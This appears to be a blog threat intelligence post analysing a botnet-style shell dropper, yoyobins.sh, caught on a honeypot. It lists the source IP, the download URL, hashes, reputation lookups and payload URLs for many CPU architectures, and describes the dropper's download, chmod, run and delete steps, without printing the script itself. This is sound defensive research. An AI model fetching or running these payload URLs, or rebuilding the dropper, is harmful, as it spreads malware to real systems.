Script Analysis- yoyobins.sh

In addition to my weekly threat intel report, I want to highlight a particular file/executable/exploit attempt I saw in the last week.  I’ll do some basic analysis of the file to better understand what it is, and what it’s trying to accomplish. Hopefully this can provide contextual data for those doing their own research.

This week we’re looking at yoyobins.sh, a malicious file acting as a malware dropper. My logs show an American IP address logged into my honeypot, then reached out to a Croatian IP for the file dropper: yoyobins.sh. When this script is run, it requests a number of additional payloads and attempts to save them to various directories (/tmp, /var/run, /root). Once saved, it changes the scripts permissions to be executable, runs the program, then kills the file after it completes.

Filename: yoyobins.sh
Timestamp: 2020-06-08 12:59PM PST
Initiating Source IP: 104.248.48.57
Downloaded from: http://45.95.168.196/yoyobins.sh
SHA256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
Virus Total Link: https://www.virustotal.com/gui/file/bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1/detection

File Contents:

https://www.ipvoid.com/

Initiating Source IP Analysis:

Analysis Date2020-06-08 21:39:51
Elapsed Time2 seconds
Blacklist StatusBLACKLISTED 11/114
IP Address104.248.48.57 Find Sites | IP Whois
Reverse DNSprod-nyc1.qencode-encoder-d9bdf0b8a9ec11ea888b0e903d539a24
ASNAS14061
ASN OwnerDIGITALOCEAN-ASN
ISPDigital Ocean
ContinentNorth America
Country CodeFlag  (US) United States
Latitude / Longitude40.793 / -74.0247 Google Map
CityNorth Bergen
RegionNew Jersey


Download URL analysis:

Analysis Date2020-06-08 21:40:37
Elapsed Time3 seconds
Blacklist StatusBLACKLISTED 6/114
IP Address45.95.168.196 Find Sites | IP Whois
Reverse DNSslot0.ormardex.com
ASNAS42864
ASN OwnerGiganet Internet Szolgaltato Kft
ISPMAXKO j.d.o.o.
ContinentEurope
Country CodeFlag  (HR) Croatia
Latitude / Longitude45.4675 / 16.3868 Google Map
CitySisak
RegionSisacko-Moslavacka Zupanija


Virus Total Stats:
As of 2020-06-08, 32/60 engines detect this file as malicious

Additional properties:
MD5: a39ab86543f724295ce2678e78d754f5
SHA-1: 7078ca1701557231495c035cba938588e5fb1b2b
SHA-256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
SSDEEP: 12:q0FoV0FS0Fd0c43fX0Fa8eekX0Flk0FVUX0Fg1FZ0FlEX0FC0FdeV8po0F7O0FQ:vo+nyc4krasvVUsg+lEsX9JnQ
File type: Shell script
Magic: Bourne-Again shell script text executable
File size: 1.48 KB (1516 bytes)

Contacted URLS:

http://45.95.168.196/mips
http://45.95.168.196/mipsel
http://45.95.168.196/sh4
http://45.95.168.196/x86
http://45.95.168.196/armv6l
http://45.95.168.196/i686
http://45.95.168.196/powerpc
http://45.95.168.196/i586
http://45.95.168.196/m68k
http://45.95.168.196/sparc

Windows Defender:

Virus Total Graph Summary:

Leave a Reply

Your email address will not be published. Required fields are marked *